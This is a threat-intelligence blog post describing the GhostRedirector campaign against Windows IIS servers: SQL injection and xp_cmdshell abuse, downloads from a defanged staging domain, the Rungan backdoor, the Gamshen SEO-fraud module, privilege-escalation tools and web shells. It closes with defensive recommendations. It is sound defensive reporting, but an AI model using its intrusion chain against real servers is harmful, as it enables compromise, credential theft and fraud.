GhostRedirector: Server Poltergeist and SEO Fraud
- Javier Conejo del Cerro
- 5 sept
- 2 Min. de lectura
A new phantom threat is haunting Windows servers worldwide. A previously undocumented cluster named GhostRedirector, assessed as China-aligned, has compromised more than 65 Windows servers since at least August 2024. By deploying the Rungan backdoor and the Gamshen IIS module, the attackers combined remote access with SEO fraud-as-a-service, hijacking legitimate infrastructure to promote shady gambling websites while also enabling deeper persistence and data theft.
Phase 1: Breaching the Walls
The intrusion begins with a SQL injection flaw, the likely entry vector used to penetrate vulnerable servers. Once inside, attackers exploited sqlserver.exe and its stored procedure xp_cmdshell to execute commands, triggering PowerShell scripts that downloaded additional tools from staging infrastructure hosted on 868id[.]com. This foothold was crucial: it allowed the attackers to implant their toolkit while blending into normal database activity, a classic case of turning legitimate utilities into weapons of compromise.
Phase 2: Phantom Installation
With persistence established, GhostRedirector deployed its arsenal. The Rungan backdoor, a C++ tool, awaited incoming requests at specific URLs and was capable of creating rogue user accounts, listing folders, adding new listening URLs, and executing arbitrary commands. Alongside it, the Gamshen IIS module—a member of the malicious “Group 13” IIS malware family—was installed directly into web server processes. Gamshen intercepted traffic specifically from Googlebot, inserting artificial backlinks into responses to boost third-party websites in search rankings. Though harmless to regular visitors, this scheme corrupted SEO integrity and associated victim organizations with fraudulent gambling promotions, damaging reputation while giving attackers an ongoing channel of manipulation.
Phase 3: Tools of the Poltergeist
GhostRedirector’s toolkit extended beyond Rungan and Gamshen. The attackers also dropped:
GoToHTTP, enabling remote browser-based access.
BadPotato/EfsPotato, privilege escalation tools to create administrator-level accounts.
Zunput, used for reconnaissance of hosted websites and planting ASP, PHP, and JavaScript web shells.
Together, these tools granted attackers long-term persistence, stealth, and flexibility. Data stolen during operations included server details, hosted website information, and administrator credentials, all exfiltrated covertly while servers were exploited for SEO manipulation.
Phase 4: Victims Haunted
GhostRedirector’s reach spanned Brazil, Thailand, and Vietnam, with additional infections reported in Peru, the U.S., Canada, Finland, India, the Netherlands, the Philippines, and Singapore. Victims included organizations across education, healthcare, insurance, transportation, technology, and retail sectors—entities hosting IIS services to deliver critical functions. Instead, their servers became haunted houses: still serving normal users, but secretly manipulated to amplify gambling sites and leaking sensitive internal data to attackers.
Phase 5: Banishing the Ghosts
The campaign reflects how legitimate infrastructure can be silently hijacked, turning trusted platforms into fraud machines. Defenders must strengthen resilience by:
Patching SQL injection flaws promptly and auditing database permissions.
Hardening IIS servers and regularly scanning for rogue modules like Gamshen.
Monitoring for unusual PowerShell executions or unauthorized use of sqlserver.exe.
Auditing SEO anomalies such as unexplained backlinks or altered search engine traffic.
Detecting persistence mechanisms like rogue accounts, tools (GoToHTTP, BadPotato), or hidden web shells.
Leveraging strong EDR, account controls, and immutable logs to expose stealthy activity and recover trust.
GhostRedirector demonstrates how cybercriminals can blend espionage, fraud, and persistence into one package—haunting servers not just as backdoors, but as tools of deception that undermine digital trust at scale.
Comentarios